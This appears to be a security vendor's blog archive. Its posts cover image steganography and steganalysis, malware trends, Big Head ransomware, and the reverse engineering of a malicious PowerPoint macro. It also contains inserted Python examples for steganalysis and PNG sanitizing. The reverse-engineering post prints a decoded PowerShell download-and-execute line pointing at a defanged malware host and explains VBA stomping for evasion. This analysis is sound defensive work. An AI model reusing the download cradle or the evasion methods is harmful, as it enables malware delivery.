

    The Beginner's Guide – Preventing the Invisible Malware: What Is Steganalysis and How CDR Can Improve Our Security (Part-2)

    July 31, 2023

    Target: Consumers

    Tags:  Content Disarm and Reconstruction (CDR), Malware, Images, Steganography, Zero-Trust

    In our initial blog post, we explored the technique malware authors use to hide malicious code within images, known as steganography. In this blog, we focus on the advanced detection tools designed to uncover it, collectively known as steganalysis. We will delve into the limitations of these tools and explore how the zero-trust prevention approach of Content Disarm and Reconstruction (CDR) can address these challenges. Our upcoming blog (Part-3) will provide insights into reverse engineering evasive malware discovered within images.

    Steganalysis refers to the field of study and techniques used to detect the presence of hidden information within digital media, such as images, audio files, or videos, that has been concealed through steganography. Steganography involves the covert embedding of data within a carrier medium, making it imperceptible to casual observers. Steganalysis aims to uncover and analyze the hidden data, identify the steganographic algorithms or methods used, and determine if a given media file contains hidden information. It involves the application of statistical analysis, signal processing, machine learning, and other computational methods to reveal the presence of steganography and distinguish between innocent media and steganographic content. Steganalysis plays a crucial role in digital forensics, security, and counterintelligence, providing means to detect covert communication and potential malicious activities.

    Steganalysis Methods

    Muralidharan et al. [1] provide a detailed survey of state-of-the-art image steganalysis. We can divide steganalysis into three categories:

    1. Statistical Analysis: Statistical analysis is a fundamental approach in steganalysis. It involves analyzing the statistical properties of images to detect hidden information. Common techniques include histogram analysis, spatial domain analysis, and frequency domain analysis [4].
    2. Machine Learning-Based Methods: With the advent of machine learning algorithms, steganalysis has witnessed significant advancements. Various machine learning models, such as support vector machines (SVM), artificial neural networks (ANN), and deep learning architectures, have been applied to steganalysis tasks. These models learn from a vast amount of data and can detect subtle patterns indicative of steganography.
    3. Rich Model Features: Steganalysis methods can leverage rich model features to enhance detection accuracy. These features encompass higher-level image characteristics, such as texture, color, and spatial relationships. By extracting and analyzing these features, steganalysis algorithms can effectively distinguish between regular and steganographic images.

    However, steganalysis is far from perfect, and the following limitations exist:

    1. Single Dataset Limitation: Many steganalysis methods are created, tested, and utilized only on a single dataset [1]. This can lead to a lack of versatility, potentially limiting the effectiveness of these methods when faced with different datasets. The methods might fail to generalize well across diverse scenarios and image collections, which may affect their real-world applicability.
    2. Specificity of Targeted Steganography Schemes: The paper [1] points out that many steganalysis methods seem to target only specific steganography schemes. This means that while they might be effective in detecting and analyzing certain steganographic methods, they might be inefficient or entirely ineffective against others. This narrow focus might limit the overall effectiveness of such steganalysis methods.
    3. Difficulty with Advanced Steganography Methods: The paper [1] highlights that some steganography techniques, such as coverless and Generative Adversarial Networks (GAN) based steganography, are not adequately countered by current steganalysis methods. These more advanced methods present a significant challenge for steganalysis, indicating that the field may struggle to keep pace with the evolution of steganography techniques.
    4. High Embedding Rates: Steganography techniques that employ a high embedding rate can pose challenges for steganalysis. When a large amount of data is hidden within an image, it becomes more difficult to detect the presence of hidden information. Steganalysis algorithms may struggle to differentiate between legitimate image noise and the embedded data, especially if the original image is unknown.
    5. Adaptive Steganography: Adaptive steganography techniques dynamically adjust the embedding process based on specific image characteristics. These methods can evade traditional steganalysis methods by exploiting vulnerabilities in the detection algorithms. As a result, detecting adaptive steganography becomes a daunting task for steganalysis systems.
    6. Low-Bit Attacks: Attackers employing low-bit steganography techniques embed a minimal amount of data into the cover image. This method aims to stay below the detection threshold of steganalysis algorithms, making the hidden information less noticeable. Steganalysis methods optimized for higher embedding rates may fail to detect such subtle alterations, rendering them ineffective against low-bit attacks.

    Steganalysis is a trust-based detection solution, and because of the drawbacks above, evasive malware can bypass it. As a result, zero-trust prevention based on CDR is needed.

    How Does Image Content Disarm and Reconstruction Work?

    A recent study [2] examines an alternative approach for neutralizing steganography and malware attacks within images. Our method is similar and likewise relies on transcoding.

    Image transcoding involves converting an image file from one format to another, which may entail modifying the resolution, color depth, and format of the image data. In the broader context of digital media, transcoding refers to the direct conversion of encoding between different formats [2].

    Transcoding is typically performed when the target device lacks support for the original image format or has limited storage capacity, necessitating a reduction in file size [2]. For instance, a high-resolution JPEG file might be transcoded into a lower resolution PNG file for improved website loading speed due to its smaller file size.

    The process of image transcoding consists of two steps. Initially, the original data is decoded into an intermediate uncompressed format, after which it is encoded into the desired target format. This transcoding process can be either lossy or lossless. In lossy transcoding, certain information is lost during the conversion, resulting in a potential degradation of image quality. This method is commonly employed when the target device has limited storage capacity. Conversely, lossless transcoding retains all information and preserves image quality [2]. Typically, scaling modifications are utilized during transcoding.

    It is important to note that transcoding differs from compression and trans-muxing/rewrapping. Compression involves reducing file size without altering the format, while trans-muxing/rewrapping changes the container format while keeping the data intact [2].

    In summary, image transcoding plays a vital role in modern digital workflows by facilitating the conversion of images to the most suitable format for their intended use. It enables consistent viewing of image content across a diverse range of devices with varying capabilities and constraints [2].

    Image Content Disarm and Reconstruction (CDR) employs transcoding and scaling techniques to fortify image files against evasive steganography and concealed metadata. This approach generates a new image file with a different format, devoid of metadata and extraneous information. The transcoded file can later be converted back to the original format. Transcoding has been proven as a secure measure against malware attacks [2].
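As an added example (not code from the BUFFERZONE post or from the cited paper [2]), the Python below builds a constructed grey image, applies the pairs-of-values chi-square test that histogram-based statistical steganalysis uses, shows it catching a full-rate LSB embedding but missing a 10% "low-bit" embedding, and then applies a CDR-style transcode (decode, rescale, re-encode) after which the planted bits are unrecoverable in both cases. The image data, the payload bytes and the 3.5 decision threshold are all constructed for this example.

```python
import random

WIDTH, HEIGHT = 128, 128          # constructed image size
STEGO_RATIO = 3.5                 # constructed decision threshold (chi2 / dof)


def make_cover(seed: int = 1) -> list[int]:
    """Constructed cover: a flat grey patch (sky-like) with sensor noise.
    Its histogram is steep, so the counts of values 2k and 2k+1 differ a lot."""
    rng = random.Random(seed)
    return [max(0, min(255, round(rng.gauss(100, 2.5))))
            for _ in range(WIDTH * HEIGHT)]


def random_payload(nbytes: int = 2048, seed: int = 7) -> bytes:
    """Constructed stand-in for hidden data (an encrypted payload looks random)."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(nbytes))


def to_bits(payload: bytes) -> list[int]:
    return [(b >> i) & 1 for b in payload for i in range(8)]


def lsb_embed(pixels: list[int], payload: bytes, rate: float) -> list[int]:
    """LSB replacement over the first `rate` fraction of pixels, the textbook
    method the series describes; present only to build the test input."""
    bits = to_bits(payload)
    out = list(pixels)
    for k in range(int(len(pixels) * rate)):
        out[k] = (out[k] & 0xFE) | bits[k % len(bits)]
    return out


def chi_square_pov(pixels: list[int]) -> float:
    """Pairs-of-values test: LSB replacement only moves pixels between the
    values 2k and 2k+1, so their histogram counts converge.  Returns the
    chi-square statistic per degree of freedom: about 1 when the pairs look
    equalised (stego-like), large when the natural asymmetry is intact.
    (The classic test converts this into a p-value; a ratio threshold is
    used here to keep the example dependency-free.)"""
    hist = [0] * 256
    for v in pixels:
        hist[v] += 1
    chi2, dof = 0.0, 0
    for k in range(128):
        a, b = hist[2 * k], hist[2 * k + 1]
        if a + b:                     # empty pairs carry no information
            chi2 += (a - b) ** 2 / (a + b)
            dof += 1
    return chi2 / dof


def looks_stego(pixels: list[int]) -> bool:
    return chi_square_pov(pixels) < STEGO_RATIO


def transcode(pixels: list[int], width: int, height: int) -> list[int]:
    """CDR-style transcode of the decoded raster: 2x box downscale, then
    nearest-neighbour upscale back to the original size, re-quantised to
    8 bits.  Only pixel data passes through this path; container metadata
    and trailing bytes are not carried across."""
    small = []
    for y in range(0, height, 2):
        for x in range(0, width, 2):
            block = [pixels[(y + dy) * width + x + dx] for dy in (0, 1) for dx in (0, 1)]
            small.append((sum(block) + 2) // 4)      # round half up
    sw = width // 2
    return [small[(y // 2) * sw + x // 2] for y in range(height) for x in range(width)]


def payload_bit_agreement(pixels: list[int], payload: bytes, rate: float) -> float:
    """Fraction of embedded positions whose LSB still equals the planted bit;
    0.5 means the hidden bits are as good as gone."""
    bits = to_bits(payload)
    n = int(len(pixels) * rate)
    return sum((pixels[k] & 1) == bits[k % len(bits)] for k in range(n)) / n


def demo() -> dict:
    cover = make_cover()
    payload = random_payload()
    full = lsb_embed(cover, payload, 1.0)   # high embedding rate
    low = lsb_embed(cover, payload, 0.1)    # 'low-bit' attack: 10% of pixels
    return {
        "clean_flagged": looks_stego(cover),        # False
        "full_rate_flagged": looks_stego(full),     # True: the test catches it
        "low_rate_flagged": looks_stego(low),       # False: slips under the test
        "full_bits_after_cdr": payload_bit_agreement(
            transcode(full, WIDTH, HEIGHT), payload, 1.0),   # ~0.5
        "low_bits_after_cdr": payload_bit_agreement(
            transcode(low, WIDTH, HEIGHT), payload, 0.1),    # ~0.5
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The detector result depends on the embedding rate, while the transcode result does not: that asymmetry is the argument for prevention over detection.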

    Summary

    The prevalence of steganography attacks is escalating [3], and present detection methodologies exhibit notable limitations. Consequently, Content Disarm and Reconstruction (CDR) emerges as a dependable solution, assuring absolute security without substantial visual alterations [1]. Therefore, integrating CDR into your security infrastructure merits consideration.

    Pictorially, the images below represent a ‘before’ and ‘after’ application of CDR, with the former on the right and the latter on the left. It is discernible that there are no visual discrepancies perceptible to the naked eye.

    To encapsulate, adopting a zero-trust approach to file prevention demonstrates remarkable efficiency and efficacy in countering elusive threats that traditional detection methods may overlook.

    In the next blog we will reverse engineer malicious images.


    References

    [1] Muralidharan, T., Cohen, A., Cohen, A., & Nissim, N. (2022). The infinite race between steganography and steganalysis in images. Signal Processing, 108711.

    [2] Eli Belkind, Ran Dubin and Amit Dvir, Open Image Content Disarm and Reconstruction, 2023, https://arxiv.org/abs/2307.14057

    [3] Security Boulevard, Steganography in Cybersecurity: A Growing Attack Vector,

    https://securityboulevard.com/2022/05/steganography-in-cybersecurity-a-growing-attack-vector/

    [4] Muralidharan, Trivikram, et al. “The infinite race between steganography and steganalysis in images.” Signal Processing (2022): 108711.


    What Can We Learn from VirusTotal Malware Trends Report 2023

    July 27, 2023

    Target: Consumers

    Tags:  Content Disarm and Reconstruction (CDR), Malware, Isolation, Safe Workspace®, Zero-Trust

    Several interesting trends were highlighted in the recent VirusTotal Malware Trends Report for July 2023, including a notable increase in the number of malicious files attached to emails from March to April 2023 [1]. The growing use of popular formats like OneNote and JavaScript alongside HTML for malicious purposes is an emerging concern.

    One trend in this landscape has been the spike in suspicious PDF files linked to malicious campaigns over the past two years. These PDF files serve different purposes, such as exploiting vulnerabilities or phishing, with the latter being more common [1]. However, OneNote has emerged as a popular format for distributing malware through email attachments in 2023. It became the fastest-growing format for malicious attachments that year, presenting a significant shift in cybercriminal tactics [1].

    A common technique with malicious OneNote files is embedding a malicious file (VBA, HTML + JavaScript, PowerShell, or a combination of them) and attempting to persuade the victim to enable execution. Security vendors have made strides in their detection capabilities for this format, with antivirus detection improving significantly after the first half of February 2023 [1].

    Another prominent trend has been the increased use of JavaScript distributed alongside HTML in sophisticated phishing attacks. These attacks are designed to steal victims’ credentials. In light of these trends, traditional formats like Excel, RTF, CAB, compressed formats, and Word have declined in popularity as malicious attachments [1].

    It’s important to mention that ISO files are emerging as a flexible alternative for both widespread and targeted attacks, making them difficult to scan by some security solutions due to heavy compression. These ISO files are often disguised as legitimate installation packages for various software, making them a challenging threat.

    The malware landscape in 2023 has seen the rise of unconventional methods for malware delivery, mainly through OneNote and JavaScript attachments, while traditional formats are becoming less popular. Security practitioners should take note of these trends and adjust their defensive strategies accordingly. We at BUFFERZONE® believe in application isolation and Content Disarm and Reconstruction (CDR).

    BUFFERZONE® Safe Workspace®

    BUFFERZONE Safe Workspace® is a suite of prevention capabilities based on application isolation technology that includes Safe Browsing, SafeBridge® (Content Disarm and Reconstruction capabilities), and Safe Removable (USB attack prevention), all combined with clipboard security. Safe Workspace® virtual container is created by a kernel driver, which virtually separates the operating system into two logical zones. The first zone is the trusted zone, which is connected to all the organization’s networks and the operating system’s files. The second zone is called the untrusted zone, which acts as a buffer zone where different applications can securely run isolated from the trusted zone’s memory, files, registry, and processes. This method offers advantages such as low CPU and memory footprint, high quality of experience, and the ability to seamlessly work inside the virtual container without noticing that you are protected from browsing and USB threats. BUFFERZONE® is the only virtual containment solution based on six patented technologies.

    By using an advanced isolation solution, the organization’s content is secure. Downloaded attachments are isolated, while antivirus and EDR (Endpoint Detection and Response) solutions can always scan the untrusted virtual zone. The virtual environment can be cleaned in one click, eliminating malicious traces. Ransomware will not be able to run and attack the endpoint. BUFFERZONE CDR technology prevents evasive file-based malware attacks such as OneNote [2].

    References

    [1] VICENTE DÍAZ, VirusTotal Malware Trends Report: Emerging Formats and Delivery Techniques, https://blog.virustotal.com/2023/07/virustotal-malware-trends-report.html

    [2] BUFFERZONE Security, OneNote Malware Attack Prevention Using Content Disarm and Reconstruction, https://bufferzonesecurity.com/onenote-malware-attack-prevention-using-content-disarm-and-reconstruction/


    The Beginner's Guide – Preventing the Invisible Malware: How Steganography Works (Part-1)

    July 20, 2023

    Target: Consumers

    Tags:  Content Disarm and Reconstruction (CDR), Malware, Images, Steganography, Zero-Trust

    Throughout this blog series, we will delve into the following topics: understanding steganography (part 1), exploring steganalysis and enhancing prevention techniques (part 2), and unraveling the process of disarming and reversing malicious malware concealed within image metadata (part 3).

    Image steganography is a technique that can hide evasive code in plain sight, such as within an image file. The practice of concealing messages or information within another non-secret text or data, referred to as the “carrier,” allows malicious actors to compromise devices just by hosting an image on a website or sending an image via email [1].

    This process becomes particularly effective as digital images are merely streams of bytes, like any other file. As a result, they become an excellent medium for concealing secret text and other data. When people open a picture on a device, they seldom look beyond the visual presentation displayed to see what lies hidden inside the image file format [1].

    One simple method of image steganography is appending a string to the end of the file or inside the image metadata information. This action does not prevent the image from being displayed normally nor change its visual appearance. For example, appending “hello world” to the end of the file does not alter the image, but the output from the hex dump shows the extra bytes added. A program can easily read the plain text string [1].

    In more complex methods, malware can be injected into digital photos that appear to be perfectly normal, a process known as steganography. The technique takes advantage of the hidden data that comes with an image, which is not necessarily translated into pixels on your screen. Malware code can be embedded in an image in many ways, including attaching it to the end of a file, tweaking individual bits of the code, or changing the metadata associated with the file [1].
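The two simple hiding places just described, bytes appended after the end of the image and text stuffed into metadata, can be found by walking the file's structure rather than looking at pixels. As an added example (not code from this post), the Python below parses a PNG chunk by chunk, reports text chunks and any bytes after IEND, and rebuilds the file from the chunks a viewer needs, which is the container-level part of what CDR does. The 2x2 greyscale PNG is constructed inline; only the standard library is used.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Chunks required to render the pixels; sanitize_png drops everything else.
CRITICAL = {b"IHDR", b"PLTE", b"IDAT", b"IEND"}
TEXT_CHUNKS = {b"tEXt", b"zTXt", b"iTXt"}


def chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one PNG chunk: length, type, data, CRC over type + data."""
    return (struct.pack(">I", len(data)) + ctype + data
            + struct.pack(">I", zlib.crc32(ctype + data) & 0xFFFFFFFF))


def parse_png(blob: bytes):
    """Return (chunks, trailing): chunks is a list of (type, data) in file
    order up to and including IEND; trailing is every byte after IEND,
    which decoders ignore but which can carry appended data."""
    if not blob.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos, chunks = len(PNG_SIG), []
    while pos + 8 <= len(blob):
        length, ctype = struct.unpack(">I4s", blob[pos:pos + 8])
        data = blob[pos + 8:pos + 8 + length]
        crc = blob[pos + 8 + length:pos + 12 + length]
        if len(data) != length or len(crc) != 4:
            raise ValueError("truncated chunk")
        if struct.unpack(">I", crc)[0] != (zlib.crc32(ctype + data) & 0xFFFFFFFF):
            raise ValueError(f"bad CRC in chunk {ctype!r}")
        chunks.append((ctype, data))
        pos += 12 + length
        if ctype == b"IEND":
            return chunks, blob[pos:]
    raise ValueError("no IEND chunk")


def audit_png(blob: bytes) -> dict:
    """Report what a viewer never shows: text metadata, other ancillary
    chunks, and bytes appended after the end of the image."""
    chunks, trailing = parse_png(blob)
    return {
        "text_chunks": [(t, d) for t, d in chunks if t in TEXT_CHUNKS],
        "ancillary": [t for t, _ in chunks if t not in CRITICAL],
        "trailing_bytes": trailing,
    }


def sanitize_png(blob: bytes) -> bytes:
    """Reconstruct the PNG from its critical chunks only, dropping the trailer."""
    chunks, _ = parse_png(blob)
    return PNG_SIG + b"".join(chunk(t, d) for t, d in chunks if t in CRITICAL)


def make_sample() -> bytes:
    """Constructed 2x2 8-bit greyscale PNG carrying both tricks from the post:
    a tEXt comment and a string appended after IEND."""
    ihdr = struct.pack(">IIBBBBB", 2, 2, 8, 0, 0, 0, 0)   # 2x2, 8-bit, grey
    raw = b"\x00\x10\x20" + b"\x00\x30\x40"                # filter byte + 2 pixels per row
    png = (PNG_SIG + chunk(b"IHDR", ihdr)
           + chunk(b"tEXt", b"Comment\x00hidden note")
           + chunk(b"IDAT", zlib.compress(raw))
           + chunk(b"IEND", b""))
    return png + b"hello world"       # appended bytes; the image still displays


if __name__ == "__main__":
    sample = make_sample()
    print(audit_png(sample))
    print(audit_png(sanitize_png(sample)))
```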

    However, injecting malware into an image is not as simple as it may first seem. There are two main challenges:

    • Image Distribution: Steganography in digital media often requires subtly manipulating the image’s pixels or metadata to encode the malicious code. This manipulation is not visually perceptible to the human eye but can cause havoc when decoded by the machine. Yet, this process becomes even more challenging when sharing these manipulated media files via social media networks. These platforms often resize, recompress, strip metadata, and sometimes crop or color-correct images. These manipulations restructure the image and may disarm the attack, challenging the attackers [1].


    • Execution: Although image files carry malware, they cannot automatically infect the system when opened. The exploitation occurs when there is a software vulnerability that the hidden malicious code can exploit, or the user enables an embedded macro that triggers the malware. For example, please review our previous blog about


    Therefore, while image steganography serves as a potential medium for malware delivery, the complexity of execution and the need for certain user actions or system vulnerabilities make it challenging as an attack vector; however, from recent attacks, we see malware steganography on the rise [2].

    How a Steganography Attack Works:

    Steganography is the process of concealing secret information within an ordinary, non-secret file or message to avoid detection. The two most common image steganography methods are the Least Significant Bit (LSB) method and the method based on style transfer.

    1. Least Significant Bit (LSB) Method

    The Least Significant Bit (LSB) method is the most common and simplest form of image steganography. This method involves altering the least significant bit of the pixel values in a digital image. In this process, the cover image is selected, and the least significant bits of the pixel values are replaced with the bits from the secret data.

    The basic idea behind the LSB method is that changes to the least significant bits of the pixel values will have a minimal effect on the color and appearance of the image. This makes the alterations to the image hard to detect for the human eye.

    The LSB method can be used with diverse types of images, including grayscale, colored, and true color images. The data size that can be hidden using this method depends on the size and the type of the image. For further reading about state-of-the-art LSB steganography attacks please find this paper by Liu et al [3].

    2. Image Steganography based on Style Transfer

    Recently, a novel approach to image steganography has been proposed which makes use of neural networks and style transfer techniques. Style transfer is a process that manipulates a digital image or video to adopt the visual style of another image.

    In this method, the secret message is embedded into the cover image while the image’s style is being transformed. The secret information is integrated into the latent representation of the cover image to generate the steganography images. The steganography images generated this way are indistinguishable from normal stylized images. This method leverages the power of neural networks and takes advantage of the complex transformations involved in style transfer to hide the secret message [4].

    The two methods have their advantages and disadvantages. The LSB method is simple and easy to implement but can be vulnerable to steganalysis techniques if not done properly. On the other hand, the style transfer-based method can provide high security, but it requires more computational resources and a deeper understanding of neural networks and style transfer techniques.

    Summary

    To sum up, image steganography serves as a valuable and invisible asset for threat actors, both for concealed communication and for hiding malicious code. Given the progress made in technology and the emergence of advanced techniques such as style transfer-based steganography, image steganography remains an essential field of study [4], and its use by threat actors is on the rise.

    In our upcoming blog post, we will explore the concept of steganalysis (the detection of steganography) and its inherent limitations. Furthermore, we will present Content Disarm and Reconstruction as a potential solution to overcome these limitations.


    References

    [1] Ran Dubin Image steganography (TODO – add link)

    [2] Security Boulevard, Steganography in Cybersecurity: A Growing Attack Vector

    https://securityboulevard.com/2022/05/steganography-in-cybersecurity-a-growing-attack-vector/

    [3] J. Liu et al., “Recent Advances of Image Steganography with Generative Adversarial Networks,” in IEEE Access, vol. 8, pp. 60575-60597, 2020, doi: 10.1109/ACCESS.2020.2983175.

    [4] Hu, Donghui, et al. “Image Steganography based on Style Transfer.” arXiv preprint arXiv:2203.04500 (2022).

    [5] https://arxiv.org/pdf/2307.14057.pdf

    The Beginner's Guide To – OLE Malware Reverse Engineering Part 2

    July 13, 2023

    Target: Cybersecurity specialist

    Tags: OLE, PowerPoint, Excel, Word, Malware, Content Disarm and Reconstruction (CDR), Reverse Engineering.

    In the first part, we introduced a fundamental approach to reverse-engineering a harmful OLE file, concentrating
    on a malicious PowerPoint document associated with a threat dubbed Valyria or RevengeRat (Link to file).
    This malware manipulates PowerPoint by embedding a malignant VBA script which leverages P-Code encoding to
    obfuscate a harmful PowerShell script, thereby evading detection mechanisms. The obfuscated PowerShell script
    downloads the next phase of the attack, which intriguingly takes the form of a PowerShell script
    masquerading as an image file. In this blog we will continue the first part and use the same methodology.

    OLE PowerPoint Research

    In this blog we will investigate the file with SHA-256:
    0562a2df06412fc0038afca2d27c4b1428681a518015cd2fd823df9b55db21f9

    Threat Intelligence:
    The first stage will be reviewing the file in VirusTotal to get reputation and information about the file.


    We can observe that the file is detected as malicious by 36 engines and the popular threat is trojan type:
    trojan.valyria/mrair

    Dynamic Analysis:

    From viewing the file in a VMRay sandbox environment (Link ) we can observe that the sandbox failed to load the
    preview image. In the background, however, the malware was active: it started executing malicious activity and ran a
    malicious PowerShell script.

    Now let us do the same based on static analysis.

    Static Analysis:

    We will initiate our analysis using oleid, a script specifically designed to scrutinize OLE files. It can identify
    distinctive attributes associated with malicious files.

    After running oleid <file>:

    The oleid analysis reveals the presence of a VBA macro within the file, with the additional detail that it contains
    certain suspicious keywords.
    As a result, we will execute the olevba <file> command.

    The output uncovers pertinent details regarding the detected VBA macro. We can observe an Auto_Open entry point,
    which executes automatically when the document is opened. The Run keyword means that the file may run an executable or a script (as in our use case),
    and there are hex strings, Base64-encoded data and VBA Stomping.

    VBA Stomping is an evasion tactic employed by malware creators to sidestep anti-virus software detection.
    It revolves around modifying a VBA (Visual Basic for Applications) macro within a Microsoft Office document,
    usually Word or Excel, to conceal malicious instructions.

    The term “stomping” originates from the action of overriding or ‘stomping’ on the p-code (a form of pre-compiled
    VBA instruction set) with a harmless or benign version, while maintaining the malevolent code in the VBA source code.
    The catch here is that many antivirus programs only scrutinize the p-code, not the source code. Consequently, these
    programs only perceive the innocuous p-code and overlook the harmful source code.

    Nonetheless, when the manipulated document is accessed, Microsoft Office executes the source code instead of the
    p-code if they differ, triggering the concealed harmful code.

    Olevba reveals both the macro and its corresponding P-code parsing. The VBA macro identified in the document is
    named ‘WXhI’. It is important to note that the macro begins with Auto_Open(). However, for brevity, only the significant
    parts of the document are displayed here.

    We can observe that the file contains obfuscated code (rB) that is equal to the string combination
    of “-e” and a Base64-encoded string.

    If we decode the base64 we will get:

    I EX   (@)     (N)ew-OBIject    .DownloadStream.Invoke (‘
    \x0Ahhttps://dc4444[.]4sync[.]com/dc4444.syncom/download/yeAL1jE1My4xNZuMJI
    \x0Algfpa=”40\x0A\n’)\n \nIwSAXpvztnDYuFSFEEOaRLv dIePGy iIBh aXsOSkbWbySEbwcZFY\n'[

    Our analysis reveals that the content primarily consists of ‘DownloadStream.Invoke’ alongside a URL, with ‘DownloadStream’ being a PowerShell command utilized to download content. Upon examining the reputation score from VirusTotal, it becomes evident that the URL is malicious, employed to download an additional PowerShell script. However, the code in its current state is unable to execute independently, because it has been obfuscated by P-code: the higher-level P-code joins the base64 string with the transformed data, as shown next:

    In this example, the term ‘XQMcRk’ corresponds to the letter ‘p’, while ‘FeaU’ maps to the letter ‘o’. This pattern is further illustrated in the following figure:

    To summarize this part of our research, P-code can be used to obscure the malicious intent of a file, serving as another evasion technique to bypass detection. While this form of attack is not novel, it continues to be prevalently utilized in real-world scenarios.

    How can we stop this attack?

    Content Disarm and Reconstruction (CDR) is a proactive file security approach that embodies a zero-trust philosophy.
    Rather than depending on threat detection, CDR concentrates on prevention.
    It sanitizes each potential attack vector within a file, ensuring it is safe to use. We invite you to visit our blog for more
    insights on this topic.

    Following the CDR process, the file’s malicious elements are effectively eliminated.
    The Visual Basic for Applications (VBA) content, identified as a high-risk attack vector, is automatically removed,
    thus rendering the file safe for usage. When we run BUFFERZONE CDR against the file we will receive the following
    Oleid output without the malicious VBA scripts.

    Consequently, CDR (Content Disarm and Reconstruction) serves as an exceptionally effective preventive measure.
    However, should you need to access the original file without neutralizing it, BUFFERZONE® Safe Workspace™ provides
    an ideal solution. BUFFERZONE isolates untrusted files within a secure virtual container, enabling users to open them securely. For additional details about BUFFERZONE Isolation, we encourage you to read our latest blog post on the subject.

    References

    [1] Object Linking and Embedding (OLE) Data Structures, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-oleds/85583d21-c1cf-4afe-a35f-d6701c5fbb6f

    [2] File format reference for Word, Excel, and PowerPoint, https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference

    [3] Component Object Model (COM), https://learn.microsoft.com/en-us/windows/win32/com/component-object-model–com–portal

    [4] OleTools, https://github.com/decalage2/oletools

    Big Head Ransomware Fake Windows Update Alert- What Can We Do?

    July 11, 2023

    Target: IT Professionals

    Tags: Malware, Ransomware, Zero-Trust

    Ransomware remains a significant cybersecurity concern, posing threats to personal and enterprise data. The Big Head Ransomware is a new entrant into the cyber-crime scene, which surfaced in May 2023. With its unique propagation methods and encryption techniques, Big Head Ransomware is causing ripples in the cybersecurity industry. This blog post aims to illuminate this malware’s operations, variants, and potential consequences and present a simple, cost-effective way to protect your organization.

    Three distinct variants of the Big Head Ransomware have been identified, each featuring the same contact email within their ransom instructions. This strongly suggests a common origin tied to a single malware developer [1]. This ransomware strain is under scrutiny and propagated through deceptive online advertising practices, often in the guise of bogus Windows updates and fraudulent Word installers [1]. By exploiting the naive trust of unsuspecting users, the perpetrator effectively lures victims into downloading and launching harmful software.

    Big Head operates as a .NET binary ransomware. Upon activation, it triggers a sequence of actions, including establishing a registry autorun key, overwriting existing files if necessary, setting system file attributes, and deactivating the Task Manager [1]. For each victim, it generates a unique ID, eradicates shadow copies to impede straightforward system recovery, and encrypts target files, appending a “.poop” extension to the filenames. Unique to Big Head, it deploys three AES-encrypted files, each having a specific function:

    • Propagation: An executable that drops a copy of itself for further spread.
    • Communication: A Telegram bot that communicates with the threat actor’s chatbot ID.
    • Deception and Encryption: Another executable file masks itself as a Windows update while it encrypts the user’s files and encodes file names to Base64 [1].

    Moreover, Big Head Ransomware uses a clever evasion technique: it displays a screen mimicking a legitimate Windows update during the encryption process.

    Big Head has three known variants, each exhibiting different behaviors and routines.

    • The first variant employs a .NET compiled binary file, which has a list of configurations related to the installation process, such as creating a registry key, checking the existence of a file, and overwriting it if necessary, setting system file attributes, and creating an autorun registry entry [1].
    • The second variant maintains ransomware capabilities and incorporates stealer behavior with functions to collect and exfiltrate sensitive data from the victim system. The stolen data can include browsing history, a list of directories, installed drivers, running processes, product keys, and active networks, and it can also capture screenshots [2].
    • The third variant identified by Trend Micro introduces a file infector named “Neshta,” which inserts malicious code into executables on the breached system. It is speculated that this could be an attempt to evade detection that relies on signature-based mechanisms [2].

    While Big Head Ransomware’s encryption methods are standard and its evasion techniques are easy to detect, it is important not to underestimate its potential damage. Its deceptive methods, like displaying a fake Windows update screen and disseminating via malvertising, can trick less cybersecurity-savvy individuals. As Big Head Ransomware continues to evolve, the creators are actively experimenting with different approaches to optimize their attacks. Big Head joins the increasing number of new ransomware families like Cl0p [3], LockBit [4], and BlackBasta [5] that have gained popularity in recent months.

    What can we do?

    Stay vigilant and adhere to basic cybersecurity practices, such as avoiding suspicious links and downloads, updating your software regularly, and maintaining reliable backups to combat such threats.

    A simpler and more effective solution is needed, since detection is insufficient and the human factor may bypass protection paradigms. This is why we created BUFFERZONE® Safe Workspace®.

    BUFFERZONE Safe Workspace® is a suite of prevention capabilities based on application isolation technology that includes Safe Browsing, SafeBridge® (Content Disarm and Reconstruction capabilities), and Safe Removable (USB attack prevention), all combined with clipboard security. Safe Workspace® virtual container is created by a kernel driver, which virtually separates the operating system into two logical zones. The first zone is the trusted zone, which is connected to all the organization’s networks and the operating system’s files. The second zone is called the untrusted zone, which acts as a buffer zone where different applications can securely run isolated from the trusted zone’s memory, files, registry, and processes. This method offers advantages such as low CPU and memory footprint, high quality of experience, and the ability to seamlessly work inside the virtual container without noticing that you are protected from browsing and USB threats. BUFFERZONE® is the only virtual containment solution that works based on six patented technologies.

    By using an advanced isolation solution, the organization’s content is secure. Downloaded attachments are isolated, while antivirus and EDR (Endpoint Detection and Response) solutions can always scan the untrusted virtual zone. The virtual environment can be cleaned in one click, eliminating any malicious traces. Ransomware will not be able to run and attack the endpoint.

    Try it now!


    References:

    [1] Bill Toulas, New ‘Big Head’ ransomware displays fake Windows update alert, https://www.bleepingcomputer.com/news/security/new-big-head-ransomware-displays-fake-windows-update-alert/

    [2] Ieriz Nicolle Gonzalez, Katherine Casona, Sarah Pearl Camiling, Tailing Big Head Ransomware’s Variants, Tactics, and Impact,  https://www.trendmicro.com/en_au/research/23/g/tailing-big-head-ransomware-variants-tactics-and-impact.html

    [3] CISA, CL0P Ransomware Gang Exploits CVE-2023-34362 MOVEit Vulnerability, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-158a

    [4] CISA, LockBit 3.0, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a

    [5] Sergiu Gatlan, US govt contractor ABB confirms ransomware attack, data theft, https://www.bleepingcomputer.com/news/security/us-govt-contractor-abb-confirms-ransomware-attack-data-theft/

    The Beginners Guide to Chrome Extension Research

    July 2, 2023

    Target: Cybersecurity specialist

    Tags: CRX, Chrome Extension, Malware, Reverse Engineering.

    A Chrome extension is a small software program that enhances the functionality of the Google Chrome browser. Extensions are made using web technologies such as HTML, JavaScript, and CSS and are designed to make the browsing experience more efficient and enjoyable.

    Some extensions provide utility features like ad-blocking, language translation, password management, or note taking. Others can change the appearance of your browser, provide quick access to certain websites, or enable more advanced features like developer tools.

